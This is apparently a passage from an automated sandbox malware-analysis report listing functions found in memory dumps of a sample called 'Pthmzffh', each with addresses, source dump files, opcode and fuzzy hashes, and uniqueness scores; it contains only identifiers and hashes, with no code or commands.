                                                                      • Opcode ID: 0fd51d470184d1e7cd1be65e43f16a1e077c074b6c56ed682abb822601c63c47
                                                                      • Instruction ID: a06b9ece51343bf41862abf56cb30975d463bc935964b6cb1964c209bb6bcbf9
                                                                      • Opcode Fuzzy Hash: 0fd51d470184d1e7cd1be65e43f16a1e077c074b6c56ed682abb822601c63c47
                                                                      • Instruction Fuzzy Hash: C001473021C1508BD706AF98E4109AB7FEAEF88340B11C455F549CB209C7788C04C793
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 04A79AB0 Relevance: .0, Instructions: 38COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000000F.00000002.520525715.0000000004A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A70000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_15_2_4a70000_Pthmzffh.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 149f616ba581e80c04ad2b3bd67cd64d2d70d1eccb9ba4e6c09b8a85a03f4d70
                                                                      • Instruction ID: 12d504062705bfb4a244922cc687d234e542d9bc1f0c5b810c0c3aee3d861234
                                                                      • Opcode Fuzzy Hash: 149f616ba581e80c04ad2b3bd67cd64d2d70d1eccb9ba4e6c09b8a85a03f4d70
                                                                      • Instruction Fuzzy Hash: 88F021A270D2911FF73147785C51366BBE9DBE5200F55009BC4458F2E1DE56AC43D340
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 04A39B30 Relevance: .0, Instructions: 37COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000000F.00000002.520356796.0000000004A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A30000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_15_2_4a30000_Pthmzffh.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 0c0569f60ce1cbad880c23cf0e9f4c09b3d8444e268cc7126fbc742e9c90b3f7
                                                                      • Instruction ID: 5a0ae8b58c405119c43a946cc0592779d0819a258cbca21ab754cf782d4c267b
                                                                      • Opcode Fuzzy Hash: 0c0569f60ce1cbad880c23cf0e9f4c09b3d8444e268cc7126fbc742e9c90b3f7
                                                                      • Instruction Fuzzy Hash: 2EF02BB17081049BC3057F28998043F7BAAE7D6391B1040A5F4479B245EA30AD0F8797
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 022B84B0 Relevance: .0, Instructions: 37COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000000F.00000002.516950457.00000000022B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 022B0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_15_2_22b0000_Pthmzffh.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: ef0b9fd64f770e5904aeda9c2e3aadf2eb1a19670b4dedd2b5527537618e1256
                                                                      • Instruction ID: 594669dd0413056a3a7524019f34f045b5cbfb5406a8e9e5b812a16469f5e794
                                                                      • Opcode Fuzzy Hash: ef0b9fd64f770e5904aeda9c2e3aadf2eb1a19670b4dedd2b5527537618e1256
                                                                      • Instruction Fuzzy Hash: 31F0F6313141159B8706AEC8E800DEB3BBEEF883507018425FA0A9B218CB79DD55CBE3
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 022B8CD0 Relevance: .0, Instructions: 37COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000000F.00000002.516950457.00000000022B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 022B0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_15_2_22b0000_Pthmzffh.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 615f629de7913b069f11b1c0c5cb95b28c5756d357f42d06abe86d1e6b2d0c07
                                                                      • Instruction ID: d8c289956128c9abbd81608eed75c0960b2f5ad17b1ae24c35cbb2b96e4b49b5
                                                                      • Opcode Fuzzy Hash: 615f629de7913b069f11b1c0c5cb95b28c5756d357f42d06abe86d1e6b2d0c07
                                                                      • Instruction Fuzzy Hash: 00F0FC213292058BD3199AEDD4547667ADDAF86395F04046BE04B87255C9A0AC04C393
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 04A79A58 Relevance: .0, Instructions: 37COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000000F.00000002.520525715.0000000004A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A70000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_15_2_4a70000_Pthmzffh.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: e5c4eda7cb351d701307fd72ed8b59efabe6bc3e6f7a1304129934adada83886
                                                                      • Instruction ID: c4b04fe6112cdde89a0ad6ec619008351b7e3488f4cd1451bf1d200e1bdb04d6
                                                                      • Opcode Fuzzy Hash: e5c4eda7cb351d701307fd72ed8b59efabe6bc3e6f7a1304129934adada83886
                                                                      • Instruction Fuzzy Hash: BAF0B472B052155FE72486599C04B6BF7ADEBC8720F14442AD9069B351DF61AC828784
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 022B8468 Relevance: .0, Instructions: 36COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000000F.00000002.516950457.00000000022B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 022B0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_15_2_22b0000_Pthmzffh.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 901136454f5095e6770caadcf8d3f3349c3b827d753f20b1c17ad00ab7199f05
                                                                      • Instruction ID: 97bc86bb77d9ae107af04d3ceb7c329aabbaa87624ebc9d7272dc5beb74ba20d
                                                                      • Opcode Fuzzy Hash: 901136454f5095e6770caadcf8d3f3349c3b827d753f20b1c17ad00ab7199f05
                                                                      • Instruction Fuzzy Hash: 5AF09C322041449FDB02DF98E4408EA7F79FF99350B14845AF9498B217C736DD26DBA3
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 04A7A650 Relevance: .0, Instructions: 36COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000000F.00000002.520525715.0000000004A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A70000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_15_2_4a70000_Pthmzffh.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 684a8b0a855264985b10259cb9e304cc2af4456175319e3436efc132de1d8e46
                                                                      • Instruction ID: 54d1eb74d6c391928bc0ce47c4df0c3af01454c3b0d0724bf42160a159bd8f11
                                                                      • Opcode Fuzzy Hash: 684a8b0a855264985b10259cb9e304cc2af4456175319e3436efc132de1d8e46
                                                                      • Instruction Fuzzy Hash: 68F06776304341AF97118F69E8C498A7BB9FF8A62431640AAE955CB261DA60EC028760
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 022B83D9 Relevance: .0, Instructions: 35COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000000F.00000002.516950457.00000000022B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 022B0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_15_2_22b0000_Pthmzffh.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: cf01c762cbfa8159d1facabbadb9d5ae15686e0d2a745a106fe4f9545da79555
                                                                      • Instruction ID: 0ee2f6eb1f10c6d99cd5195b2de6bd6ad8ec1b2a3692bac0c289d5cadbf17769
                                                                      • Opcode Fuzzy Hash: cf01c762cbfa8159d1facabbadb9d5ae15686e0d2a745a106fe4f9545da79555
                                                                      • Instruction Fuzzy Hash: 63F0E93127D280EBC3075AD99800BB67BBDEF81790F144057F54A8F186C5E08814C397
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 022BC9E0 Relevance: .0, Instructions: 35COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000000F.00000002.516950457.00000000022B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 022B0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_15_2_22b0000_Pthmzffh.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 6a0e08eadd565a0d88729a79bc8fb403865f14bc4e26a5da798e8f541ac5fba5
                                                                      • Instruction ID: f806d1ebdac4afc0b6ba66f8004d67532824560945abedf9dc712b0998792e1a
                                                                      • Opcode Fuzzy Hash: 6a0e08eadd565a0d88729a79bc8fb403865f14bc4e26a5da798e8f541ac5fba5
                                                                      • Instruction Fuzzy Hash: AAE0552223C5649FD3231AC418508F63B55EFEB3E07010293E8829E249D4D14902C3A3
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 04A79DA8 Relevance: .0, Instructions: 34COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000000F.00000002.520525715.0000000004A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A70000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_15_2_4a70000_Pthmzffh.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 60a7daba3177d7672673573b1ca1a857b6345bc230b8735451e0f34ebbee87b6
                                                                      • Instruction ID: 16d04614e050b9e07abe5fd44c32184f49938406547c5ae10b6619c01d3c55e7
                                                                      • Opcode Fuzzy Hash: 60a7daba3177d7672673573b1ca1a857b6345bc230b8735451e0f34ebbee87b6
                                                                      • Instruction Fuzzy Hash: F6F09E723003415FFB055F55A85076EBFE1FF8E214B1080BBE945CB350CA319C158B10
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 04A36B93 Relevance: .0, Instructions: 33COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000000F.00000002.520356796.0000000004A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A30000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_15_2_4a30000_Pthmzffh.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: e39dd1178b7789297e9b2d1b74280efe875a66c4c2fc8c8b9278e422244b4525
                                                                      • Instruction ID: 7d72447bbbc82c9bd8ddf3a1bdf4aa0362396167581138b5e3c8d87f99a2e6c2
                                                                      • Opcode Fuzzy Hash: e39dd1178b7789297e9b2d1b74280efe875a66c4c2fc8c8b9278e422244b4525
                                                                      • Instruction Fuzzy Hash: 9FF05EB6D0520CAFCB52DFE088424DEBBB9DB42305B1144E6D508DB121FA319F555B91
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 04A73330 Relevance: .0, Instructions: 33COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000000F.00000002.520525715.0000000004A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A70000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_15_2_4a70000_Pthmzffh.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: f4ba97cf5a324559796009b32b6598e476a1cbff06902a3fa658654edff79a82
                                                                      • Instruction ID: 24d2b9363e686a63c66045d17d52f63442b3f0fe06bbf817a6ac31c2cd92ef07
                                                                      • Opcode Fuzzy Hash: f4ba97cf5a324559796009b32b6598e476a1cbff06902a3fa658654edff79a82
                                                                      • Instruction Fuzzy Hash: 80F08231708214BBCF31AE49DC00CFA3BBEAB88750B018416BD0556154DA71A851F7E1
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 04A7BF20 Relevance: .0, Instructions: 32COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000000F.00000002.520525715.0000000004A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A70000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_15_2_4a70000_Pthmzffh.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 947cdc3ff4c78c193c846b292ce1b213f92f2b0478ef48dc932194cafcb15479
                                                                      • Instruction ID: 9acc590d1fcebc951b5039adc697df5e1e3796187eb40716426f4ea86a972eca
                                                                      • Opcode Fuzzy Hash: 947cdc3ff4c78c193c846b292ce1b213f92f2b0478ef48dc932194cafcb15479
                                                                      • Instruction Fuzzy Hash: CDF0B4719082049FDB15CB68D4483DCBFB2DB49618F0480A9D449D2291EF785E46C740
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 022B83E8 Relevance: .0, Instructions: 30COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000000F.00000002.516950457.00000000022B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 022B0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_15_2_22b0000_Pthmzffh.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 091ea845abfeac20762e3bec2dfc778aea1e77207803ee832a2da53307c1659f
                                                                      • Instruction ID: c8c274f12cacb4d88aa27fec26069aaafef65687644268a934817592084872d5
                                                                      • Opcode Fuzzy Hash: 091ea845abfeac20762e3bec2dfc778aea1e77207803ee832a2da53307c1659f
                                                                      • Instruction Fuzzy Hash: F3E06D3237C104E7C2165AC9A800BFA36AEEB94791F104022B64A9E188C9E18905C39B
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 022BC178 Relevance: .0, Instructions: 28COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000000F.00000002.516950457.00000000022B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 022B0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_15_2_22b0000_Pthmzffh.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 5b7395800fbcbfbf219f9ed86f07858037ce7a8e800f36f91076c1aa8ad4fb8e
                                                                      • Instruction ID: 604747382b98b4c506a09cd85aafcf8d0cb8874bed818ab52a71d1310ffb1e91
                                                                      • Opcode Fuzzy Hash: 5b7395800fbcbfbf219f9ed86f07858037ce7a8e800f36f91076c1aa8ad4fb8e
                                                                      • Instruction Fuzzy Hash: B0E0D82533C2905F9202118918514F97F59CED23D27054027EA41EB369C5994D07D7A3
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 04A7BF78 Relevance: .0, Instructions: 28COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000000F.00000002.520525715.0000000004A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A70000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_15_2_4a70000_Pthmzffh.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 3b3d6b62be72c3003fca58a26bf1d24deae678c4523f7256e3f1834c0ffffb80
                                                                      • Instruction ID: 94c0c6545b51bd3fc36a6af937dce7fe376d0d9fa2e146848389bd5aa14285de
                                                                      • Opcode Fuzzy Hash: 3b3d6b62be72c3003fca58a26bf1d24deae678c4523f7256e3f1834c0ffffb80
                                                                      • Instruction Fuzzy Hash: 4DE092F0B18243DEEB7A8BB49D1872777D59F4A54DB0404A9A406CB1D1FA30F8028F71
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 04A39110 Relevance: .0, Instructions: 27COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000000F.00000002.520356796.0000000004A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A30000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_15_2_4a30000_Pthmzffh.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 9c1968e40afe0f9e858f5149b93a30e86570913ce455a7bda5e45177d1ae4ff5
                                                                      • Instruction ID: 5d0432dec726b466cbd5b3266dd760deaeef02bea59036ef1df16de6331ade63
                                                                      • Opcode Fuzzy Hash: 9c1968e40afe0f9e858f5149b93a30e86570913ce455a7bda5e45177d1ae4ff5
                                                                      • Instruction Fuzzy Hash: B2E092361081197FDB119E94DC428D67F76EF49210704C057FD1447222C6B2DD67EB80
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 022B8431 Relevance: .0, Instructions: 27COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000000F.00000002.516950457.00000000022B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 022B0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_15_2_22b0000_Pthmzffh.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: ef5606444c1e72879a182c5df7907f9cca49ad0a295358aca6518207b3c1be4e
                                                                      • Instruction ID: 5b8951bd30bfc8255a1873d5226cb68d83467d2e14e8cd95949576594e245f48
                                                                      • Opcode Fuzzy Hash: ef5606444c1e72879a182c5df7907f9cca49ad0a295358aca6518207b3c1be4e
                                                                      • Instruction Fuzzy Hash: 55E02B3240A28CAFCB42DFE4E5005DAFFF8DF52254B1449EAC44CC7113DA218B18DB92
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 04A304C1 Relevance: .0, Instructions: 26COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000000F.00000002.520356796.0000000004A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A30000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_15_2_4a30000_Pthmzffh.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 259c54102878bc25095a17b8d31ac436e8d63b90791d29a72ffce1b965b72b30
                                                                      • Instruction ID: a0648fab3a1bd9288b73837817bf17edacb5e0ceab5661de3048d3841bf44228
                                                                      • Opcode Fuzzy Hash: 259c54102878bc25095a17b8d31ac436e8d63b90791d29a72ffce1b965b72b30
                                                                      • Instruction Fuzzy Hash: 61E0D83131C250ABD7102758780276FE5AEDBCA761F14C23AF915DA3C5FB90D9115293
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 022B22C0 Relevance: .0, Instructions: 26COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000000F.00000002.516950457.00000000022B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 022B0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_15_2_22b0000_Pthmzffh.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: b13a0e15006a630345466f722fb8058d13e75de4f21a5c477cda38e24efc7637
                                                                      • Instruction ID: fd86422daf8363c680cd272233fb833aa6d8b645b87111c4888c980e6dd7d417
                                                                      • Opcode Fuzzy Hash: b13a0e15006a630345466f722fb8058d13e75de4f21a5c477cda38e24efc7637
                                                                      • Instruction Fuzzy Hash: 8CE02B3070222547C708B7D8B5001BC76EAEBC9395B000474D90BEB345CF685E484BC2
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 022B85D0 Relevance: .0, Instructions: 26COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000000F.00000002.516950457.00000000022B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 022B0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_15_2_22b0000_Pthmzffh.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 0f1b16ec8bc0fc253ba2423b231ff0dc7dae79a9784519cf89381297efa6741e
                                                                      • Instruction ID: dba6643690ae9052699326ad5faf5190f0537e4166bb11bf1a007c545a696a9d
                                                                      • Opcode Fuzzy Hash: 0f1b16ec8bc0fc253ba2423b231ff0dc7dae79a9784519cf89381297efa6741e
                                                                      • Instruction Fuzzy Hash: 25E0927290510CAFCB12DBF0D8459DABBA4DF42254B1544EBC40CD7212EB328E06AB82
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 022BC9F0 Relevance: .0, Instructions: 26COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000000F.00000002.516950457.00000000022B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 022B0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_15_2_22b0000_Pthmzffh.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 39aa75c0f71a34ea605641c964cac10ca05c9e5ffd9961911423e857c7fd00bf
                                                                      • Instruction ID: 961c762c09841bf1af36a5eedd051c213eac51041271b6a906672401c5fe19c7
                                                                      • Opcode Fuzzy Hash: 39aa75c0f71a34ea605641c964cac10ca05c9e5ffd9961911423e857c7fd00bf
                                                                      • Instruction Fuzzy Hash: ABE02632338128EF97225DC95400DFA654DEFCA7E1B104223B983AA20CC4E55800D3A2
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 04A7DCF0 Relevance: .0, Instructions: 26COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000000F.00000002.520525715.0000000004A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A70000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_15_2_4a70000_Pthmzffh.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 2fc9f2acd3d3ac11a1240ece1add93a060c0eacd1ff56fcfccb58bffa7966285
                                                                      • Instruction ID: 2cb2b571c6632a493911a239d6a9039657fb3562acf4985c742431684b70e09d
                                                                      • Opcode Fuzzy Hash: 2fc9f2acd3d3ac11a1240ece1add93a060c0eacd1ff56fcfccb58bffa7966285
                                                                      • Instruction Fuzzy Hash: C5E0D83164A304AFFF3227A08D1079437A45F42649F14C8AAD941AF182D652FC0187A2
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 04A7BF30 Relevance: .0, Instructions: 26COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000000F.00000002.520525715.0000000004A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A70000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_15_2_4a70000_Pthmzffh.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: d44b5d5a43f5d7a4f04a59fcc577e143adf3c0c7462b4450f6630ff704776532
                                                                      • Instruction ID: 980d1e946e8b8188b7e75d3354dec7283add5a2d074ccf555d2f0ea56668627f
                                                                      • Opcode Fuzzy Hash: d44b5d5a43f5d7a4f04a59fcc577e143adf3c0c7462b4450f6630ff704776532
                                                                      • Instruction Fuzzy Hash: C3F06571A08218AFDB19DF98D4487DDBFB6EB88614F048099E009D3290DF746E82CB94
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 04A3FCAB Relevance: .0, Instructions: 25COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000000F.00000002.520356796.0000000004A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A30000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_15_2_4a30000_Pthmzffh.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: ec6aa80fc6dd9fd70e046d859cc893d0d0e5fc178ec8b4fe3bea024f2e09152d
                                                                      • Instruction ID: f42629d6b5eb29074d6bbb107c5616b327922de9d8d79b33f9a2ef473f5ad56e
                                                                      • Opcode Fuzzy Hash: ec6aa80fc6dd9fd70e046d859cc893d0d0e5fc178ec8b4fe3bea024f2e09152d
                                                                      • Instruction Fuzzy Hash: 5FE0DF361041586FDB01CF84DC518E67F79EF4A224704C096FD448B222C672DD23D7A0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 04A36BF8 Relevance: .0, Instructions: 25COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000000F.00000002.520356796.0000000004A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A30000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_15_2_4a30000_Pthmzffh.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 8608ca799686195c236128fc3b08fedd4691351797b7c053dbabe583655e557c
                                                                      • Instruction ID: e9b2cb6c68cef81109f1e6f17c19d794b9775730d8d027199bc9acaa2ab3983c
                                                                      • Opcode Fuzzy Hash: 8608ca799686195c236128fc3b08fedd4691351797b7c053dbabe583655e557c
                                                                      • Instruction Fuzzy Hash: 76E068298400885FFB36DB94C44058A7BA1EB923A272000C8D8010F092EE16375FA60A
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 04A775AA Relevance: .0, Instructions: 25COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000000F.00000002.520525715.0000000004A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A70000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_15_2_4a70000_Pthmzffh.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 7e38ec97f147b2ea624976e7839b6ca0bb16e0b480df16632a82306b8b33813f
                                                                      • Instruction ID: bfeed1b0fd3851dc8eafb6e4feba799b336022ebe9a267f0c78971a841d450a9
                                                                      • Opcode Fuzzy Hash: 7e38ec97f147b2ea624976e7839b6ca0bb16e0b480df16632a82306b8b33813f
                                                                      • Instruction Fuzzy Hash: 11E04F6290A3885FCB43EBB0899158E7FB5CF5710470101E7D545DB163E9349F0AA752
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 04A77390 Relevance: .0, Instructions: 25COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000000F.00000002.520525715.0000000004A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A70000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_15_2_4a70000_Pthmzffh.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 6ae404077942ae34c71052e8e9b3fee5c2ea29d1a6583cd2b0fbaeb995dfa49a
                                                                      • Instruction ID: 5b405c7edbde5202828f8c421b210f438fda1021df5d43962c4f0ca6c06a132a
                                                                      • Opcode Fuzzy Hash: 6ae404077942ae34c71052e8e9b3fee5c2ea29d1a6583cd2b0fbaeb995dfa49a
                                                                      • Instruction Fuzzy Hash: 0FE022321052446FCB01DFA8D850AD67F29EF86218F0984EBEE048B253C672CD22E780
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 04A323E8 Relevance: .0, Instructions: 24COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000000F.00000002.520356796.0000000004A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A30000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_15_2_4a30000_Pthmzffh.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: dd811cdfda4f02afb3f9cc772f7ef2cef1b6d1d027f96be889304620a78969cf
                                                                      • Instruction ID: bde452c805696a433e5b52872da239ce1fee644e731e8d64d5bba635d5414cd3
